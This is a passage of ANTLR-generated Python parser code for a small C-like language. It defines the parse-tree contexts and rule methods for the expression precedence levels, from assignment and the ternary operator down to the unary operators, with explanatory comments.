        if hasattr(listener, "enterOplevel15"):
            listener.enterOplevel15(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel15"):
            listener.exitOplevel15(self)
def oplevel15(self):
    """Parse an oplevel15 expression (the grammar's top expression rule);
    it simply delegates to oplevel14."""
    localctx = SmallCParser.Oplevel15Context(self, self._ctx, self.state)
    self.enterRule(localctx, 0, self.RULE_oplevel15)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 102
        self.oplevel14()
    except RecognitionException as re:
        # Standard generated recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel14Context(ParserRuleContext):
    """Parse-tree context node for the oplevel14 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel13(self):
        # Left operand subtree.
        return self.getTypedRuleContext(SmallCParser.Oplevel13Context, 0)

    def oplevel14(self):
        # Optional nested oplevel14 subtree (right-recursive alternative).
        return self.getTypedRuleContext(SmallCParser.Oplevel14Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel14

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
        if hasattr(listener, "enterOplevel14"):
            listener.enterOplevel14(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel14"):
            listener.exitOplevel14(self)
def oplevel14(self):
    """Parse an oplevel14 expression: either ``oplevel13 '=' oplevel14``
    (alternative 1, right-recursive) or a bare ``oplevel13``
    (alternative 2)."""
    localctx = SmallCParser.Oplevel14Context(self, self._ctx, self.state)
    self.enterRule(localctx, 2, self.RULE_oplevel14)
    try:
        self.state = 109
        self._errHandler.sync(self);
        # Adaptive prediction picks one of the two alternatives.
        la_ = self._interp.adaptivePredict(self._input,0,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 104
            self.oplevel13()
            self.state = 105
            self.match(SmallCParser.T__0)  # '=' (see literalNames)
            self.state = 106
            self.oplevel14()
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 108
            self.oplevel13()
            pass
    except RecognitionException as re:
        # Standard generated recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel13Context(ParserRuleContext):
    """Parse-tree context node for the oplevel13 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel12(self, i:int=None):
        # No index: return every oplevel12 child; otherwise the i-th one.
        if i is not None:
            return self.getTypedRuleContext(SmallCParser.Oplevel12Context, i)
        return self.getTypedRuleContexts(SmallCParser.Oplevel12Context)

    def oplevel13(self):
        # Optional nested oplevel13 subtree.
        return self.getTypedRuleContext(SmallCParser.Oplevel13Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel13

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
        if hasattr(listener, "enterOplevel13"):
            listener.enterOplevel13(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel13"):
            listener.exitOplevel13(self)
def oplevel13(self):
    """Parse an oplevel13 expression: either the ternary form
    ``oplevel12 '?' oplevel12 ':' oplevel13`` (alternative 1) or a bare
    ``oplevel12`` (alternative 2)."""
    localctx = SmallCParser.Oplevel13Context(self, self._ctx, self.state)
    self.enterRule(localctx, 4, self.RULE_oplevel13)
    try:
        self.state = 118
        self._errHandler.sync(self);
        # Adaptive prediction picks one of the two alternatives.
        la_ = self._interp.adaptivePredict(self._input,1,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 111
            self.oplevel12(0)
            self.state = 112
            self.match(SmallCParser.T__1)  # '?' (see literalNames)
            self.state = 113
            self.oplevel12(0)
            self.state = 114
            self.match(SmallCParser.T__2)  # ':' (see literalNames)
            self.state = 115
            self.oplevel13()
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 117
            self.oplevel12(0)
            pass
    except RecognitionException as re:
        # Standard generated recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel12Context(ParserRuleContext):
    """Parse-tree context node for the oplevel12 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel11(self):
        # Operand subtree.
        return self.getTypedRuleContext(SmallCParser.Oplevel11Context, 0)

    def oplevel12(self):
        # Optional nested oplevel12 subtree (left-recursive alternative).
        return self.getTypedRuleContext(SmallCParser.Oplevel12Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel12

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
        if hasattr(listener, "enterOplevel12"):
            listener.enterOplevel12(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel12"):
            listener.exitOplevel12(self)
def oplevel12(self, _p:int=0):
    """Parse a left-recursive oplevel12 expression:
    ``oplevel11 ('||' oplevel11)*`` (T__3 is '||' per literalNames).

    _p is the minimum precedence for the enclosing recursion, as used by
    the generated precpred checks.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel12Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 6
    self.enterRecursionRule(localctx, 6, self.RULE_oplevel12, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 121
        self.oplevel11(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 128
        self._errHandler.sync(self)
        # Loop as long as prediction keeps choosing the recursive alternative.
        _alt = self._interp.adaptivePredict(self._input,2,self._ctx)
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                localctx = SmallCParser.Oplevel12Context(self, _parentctx, _parentState)
                self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel12)
                self.state = 123
                if not self.precpred(self._ctx, 2):
                    from antlr4.error.Errors import FailedPredicateException
                    raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                self.state = 124
                self.match(SmallCParser.T__3)  # '||'
                self.state = 125
                self.oplevel11(0)
            self.state = 130
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,2,self._ctx)
    except RecognitionException as re:
        # Standard generated recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel11Context(ParserRuleContext):
    """Parse-tree context node for the oplevel11 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel7(self):
        # Operand subtree.
        return self.getTypedRuleContext(SmallCParser.Oplevel7Context, 0)

    def oplevel11(self):
        # Optional nested oplevel11 subtree (left-recursive alternative).
        return self.getTypedRuleContext(SmallCParser.Oplevel11Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel11

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
        if hasattr(listener, "enterOplevel11"):
            listener.enterOplevel11(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel11"):
            listener.exitOplevel11(self)
def oplevel11(self, _p:int=0):
    """Parse a left-recursive oplevel11 expression:
    ``oplevel7 ('&&' oplevel7)*`` (T__4 is '&&' per literalNames).

    _p is the minimum precedence for the enclosing recursion, as used by
    the generated precpred checks.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel11Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 8
    self.enterRecursionRule(localctx, 8, self.RULE_oplevel11, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 132
        self.oplevel7(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 139
        self._errHandler.sync(self)
        # Loop as long as prediction keeps choosing the recursive alternative.
        _alt = self._interp.adaptivePredict(self._input,3,self._ctx)
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                localctx = SmallCParser.Oplevel11Context(self, _parentctx, _parentState)
                self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel11)
                self.state = 134
                if not self.precpred(self._ctx, 2):
                    from antlr4.error.Errors import FailedPredicateException
                    raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                self.state = 135
                self.match(SmallCParser.T__4)  # '&&'
                self.state = 136
                self.oplevel7(0)
            self.state = 141
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,3,self._ctx)
    except RecognitionException as re:
        # Standard generated recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel10Context(ParserRuleContext):
    """Parse-tree context node for the oplevel10 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel9(self):
        # Sole child subtree of this rule.
        return self.getTypedRuleContext(SmallCParser.Oplevel9Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel10

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
        if hasattr(listener, "enterOplevel10"):
            listener.enterOplevel10(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel10"):
            listener.exitOplevel10(self)
def oplevel10(self):
    """Parse an oplevel10 expression; it simply delegates to oplevel9."""
    localctx = SmallCParser.Oplevel10Context(self, self._ctx, self.state)
    self.enterRule(localctx, 10, self.RULE_oplevel10)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 142
        self.oplevel9()
    except RecognitionException as re:
        # Standard generated recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel9Context(ParserRuleContext):
    """Parse-tree context node for the oplevel9 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel8(self):
        # Sole child subtree of this rule.
        return self.getTypedRuleContext(SmallCParser.Oplevel8Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel9

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
        if hasattr(listener, "enterOplevel9"):
            listener.enterOplevel9(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel9"):
            listener.exitOplevel9(self)
def oplevel9(self):
    """Parse an oplevel9 expression; it simply delegates to oplevel8."""
    localctx = SmallCParser.Oplevel9Context(self, self._ctx, self.state)
    self.enterRule(localctx, 12, self.RULE_oplevel9)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 144
        self.oplevel8()
    except RecognitionException as re:
        # Standard generated recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel8Context(ParserRuleContext):
    """Parse-tree context node for the oplevel8 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel7(self):
        # Sole child subtree of this rule.
        return self.getTypedRuleContext(SmallCParser.Oplevel7Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel8

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
        if hasattr(listener, "enterOplevel8"):
            listener.enterOplevel8(self)

    def exitRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the exit hook.
        if hasattr(listener, "exitOplevel8"):
            listener.exitOplevel8(self)
def oplevel8(self):
    """Parse rule ``oplevel8`` — delegates to left-recursive ``oplevel7``."""
    ctx = SmallCParser.Oplevel8Context(self, self._ctx, self.state)
    self.enterRule(ctx, 14, self.RULE_oplevel8)
    try:
        self.enterOuterAlt(ctx, 1)
        self.state = 146
        # oplevel7 is left-recursive; 0 is the starting precedence.
        self.oplevel7(0)
    except RecognitionException as err:
        ctx.exception = err
        self._errHandler.reportError(self, err)
        self._errHandler.recover(self, err)
    finally:
        self.exitRule()
    return ctx
class Oplevel7Context(ParserRuleContext):
    """Parse-tree node produced by the left-recursive ``oplevel7`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel6(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel6Context, 0)

    def oplevel7(self):
        # Present on the recursive alternatives (left operand).
        return self.getTypedRuleContext(SmallCParser.Oplevel7Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel7

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterOplevel7", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitOplevel7", None)
        if leave is not None:
            leave(self)
def oplevel7(self, _p:int=0):
    """Parse the left-recursive rule ``oplevel7``.

    ANTLR-generated: parses one ``oplevel6`` operand, then loops while the
    adaptive prediction selects another binary operator at this precedence
    level (token T__5 at precedence 3, T__6 at precedence 2), rebuilding the
    left-recursion with ``pushNewRecursionContext``.  ``_p`` is the minimum
    precedence enforced by the ``precpred`` predicates.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel7Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 16
    self.enterRecursionRule(localctx, 16, self.RULE_oplevel7, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 149
        self.oplevel6(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 159
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,5,self._ctx)
        # Loop while prediction keeps choosing the recursive alternative.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 157
                self._errHandler.sync(self);
                la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
                if la_ == 1:
                    # Alternative: oplevel7 T__5 oplevel6 (precedence 3).
                    localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
                    self.state = 151
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 152
                    self.match(SmallCParser.T__5)
                    self.state = 153
                    self.oplevel6(0)
                    pass
                elif la_ == 2:
                    # Alternative: oplevel7 T__6 oplevel6 (precedence 2).
                    localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
                    self.state = 154
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 155
                    self.match(SmallCParser.T__6)
                    self.state = 156
                    self.oplevel6(0)
                    pass
            self.state = 161
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,5,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel6Context(ParserRuleContext):
    """Parse-tree node produced by the left-recursive ``oplevel6`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel4(self):
        # NOTE(review): the grammar apparently skips level 5 here.
        return self.getTypedRuleContext(SmallCParser.Oplevel4Context, 0)

    def oplevel6(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel6Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel6

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterOplevel6", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitOplevel6", None)
        if leave is not None:
            leave(self)
def oplevel6(self, _p:int=0):
    """Parse the left-recursive rule ``oplevel6`` (comparison level).

    ANTLR-generated: one ``oplevel4`` operand, then a loop over four binary
    operators — LABRA (prec 5), T__7 (prec 4), RABRA (prec 3), T__8
    (prec 2).  Note the operand is ``oplevel4``, not ``oplevel5``; the
    grammar bypasses level 5 in this chain.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel6Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 18
    self.enterRecursionRule(localctx, 18, self.RULE_oplevel6, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 163
        self.oplevel4(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 179
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,7,self._ctx)
        # Loop while prediction keeps choosing a recursive alternative.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 177
                self._errHandler.sync(self);
                la_ = self._interp.adaptivePredict(self._input,6,self._ctx)
                if la_ == 1:
                    # oplevel6 LABRA oplevel4 (precedence 5).
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 165
                    if not self.precpred(self._ctx, 5):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
                    self.state = 166
                    self.match(SmallCParser.LABRA)
                    self.state = 167
                    self.oplevel4(0)
                    pass
                elif la_ == 2:
                    # oplevel6 T__7 oplevel4 (precedence 4).
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 168
                    if not self.precpred(self._ctx, 4):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
                    self.state = 169
                    self.match(SmallCParser.T__7)
                    self.state = 170
                    self.oplevel4(0)
                    pass
                elif la_ == 3:
                    # oplevel6 RABRA oplevel4 (precedence 3).
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 171
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 172
                    self.match(SmallCParser.RABRA)
                    self.state = 173
                    self.oplevel4(0)
                    pass
                elif la_ == 4:
                    # oplevel6 T__8 oplevel4 (precedence 2).
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 174
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 175
                    self.match(SmallCParser.T__8)
                    self.state = 176
                    self.oplevel4(0)
                    pass
            self.state = 181
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,7,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel5Context(ParserRuleContext):
    """Parse-tree node produced by the ``oplevel5`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel4(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel4Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel5

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterOplevel5", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitOplevel5", None)
        if leave is not None:
            leave(self)
def oplevel5(self):
    """Parse rule ``oplevel5`` — delegates to left-recursive ``oplevel4``."""
    ctx = SmallCParser.Oplevel5Context(self, self._ctx, self.state)
    self.enterRule(ctx, 20, self.RULE_oplevel5)
    try:
        self.enterOuterAlt(ctx, 1)
        self.state = 182
        self.oplevel4(0)
    except RecognitionException as err:
        ctx.exception = err
        self._errHandler.reportError(self, err)
        self._errHandler.recover(self, err)
    finally:
        self.exitRule()
    return ctx
class Oplevel4Context(ParserRuleContext):
    """Parse-tree node produced by the left-recursive ``oplevel4`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel3(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel3Context, 0)

    def oplevel4(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel4Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel4

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterOplevel4", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitOplevel4", None)
        if leave is not None:
            leave(self)
def oplevel4(self, _p:int=0):
    """Parse the left-recursive rule ``oplevel4``.

    ANTLR-generated: one ``oplevel3`` operand, then a loop over the two
    binary operators T__9 (precedence 3) and T__10 (precedence 2).
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel4Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 22
    self.enterRecursionRule(localctx, 22, self.RULE_oplevel4, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 185
        self.oplevel3(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 195
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,9,self._ctx)
        # Loop while prediction keeps choosing a recursive alternative.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 193
                self._errHandler.sync(self);
                la_ = self._interp.adaptivePredict(self._input,8,self._ctx)
                if la_ == 1:
                    # oplevel4 T__9 oplevel3 (precedence 3).
                    localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
                    self.state = 187
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 188
                    self.match(SmallCParser.T__9)
                    self.state = 189
                    self.oplevel3(0)
                    pass
                elif la_ == 2:
                    # oplevel4 T__10 oplevel3 (precedence 2).
                    localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
                    self.state = 190
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 191
                    self.match(SmallCParser.T__10)
                    self.state = 192
                    self.oplevel3(0)
                    pass
            self.state = 197
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,9,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel3Context(ParserRuleContext):
    """Parse-tree node produced by the left-recursive ``oplevel3`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel2(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel2Context, 0)

    def oplevel3(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel3Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel3

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterOplevel3", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitOplevel3", None)
        if leave is not None:
            leave(self)
def oplevel3(self, _p:int=0):
    """Parse the left-recursive rule ``oplevel3``.

    ANTLR-generated: one ``oplevel2`` operand, then a loop over three
    binary operators — T__11 (prec 4), T__12 (prec 3), T__13 (prec 2).
    Unlike the higher levels, the right operand ``oplevel2`` is not a
    left-recursive rule, so it is called without a precedence argument.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel3Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 24
    self.enterRecursionRule(localctx, 24, self.RULE_oplevel3, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 199
        self.oplevel2()
        self._ctx.stop = self._input.LT(-1)
        self.state = 212
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,11,self._ctx)
        # Loop while prediction keeps choosing a recursive alternative.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 210
                self._errHandler.sync(self);
                la_ = self._interp.adaptivePredict(self._input,10,self._ctx)
                if la_ == 1:
                    # oplevel3 T__11 oplevel2 (precedence 4).
                    localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
                    self.state = 201
                    if not self.precpred(self._ctx, 4):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
                    self.state = 202
                    self.match(SmallCParser.T__11)
                    self.state = 203
                    self.oplevel2()
                    pass
                elif la_ == 2:
                    # oplevel3 T__12 oplevel2 (precedence 3).
                    localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
                    self.state = 204
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 205
                    self.match(SmallCParser.T__12)
                    self.state = 206
                    self.oplevel2()
                    pass
                elif la_ == 3:
                    # oplevel3 T__13 oplevel2 (precedence 2).
                    localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
                    self.state = 207
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 208
                    self.match(SmallCParser.T__13)
                    self.state = 209
                    self.oplevel2()
                    pass
            self.state = 214
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,11,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel2Context(ParserRuleContext):
    """Parse-tree node produced by the ``oplevel2`` rule (unary level)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel2(self):
        # Nested operand of a prefix-operator alternative.
        return self.getTypedRuleContext(SmallCParser.Oplevel2Context, 0)

    def oplevel1(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel1Context, 0)

    def functionCall(self):
        return self.getTypedRuleContext(SmallCParser.FunctionCallContext, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def typeDeclaration(self):
        # Present only on the cast alternative: LBRA typeDeclaration RBRA.
        return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext, 0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel2

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterOplevel2", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitOplevel2", None)
        if leave is not None:
            leave(self)
def oplevel2(self):
    """Parse rule ``oplevel2``: prefix operators, calls and casts.

    ANTLR-generated.  Adaptive prediction chooses among ten alternatives:
    prefix tokens (T__14, T__15, T__9, T__10, T__16, T__11, T__17) applied
    to a nested oplevel2 / oplevel1, a function call, a parenthesised
    cast (LBRA typeDeclaration RBRA oplevel2), or a bare oplevel1.
    """
    localctx = SmallCParser.Oplevel2Context(self, self._ctx, self.state)
    self.enterRule(localctx, 26, self.RULE_oplevel2)
    try:
        self.state = 236
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
        if la_ == 1:
            # T__14 oplevel2 (prefix).
            self.enterOuterAlt(localctx, 1)
            self.state = 215
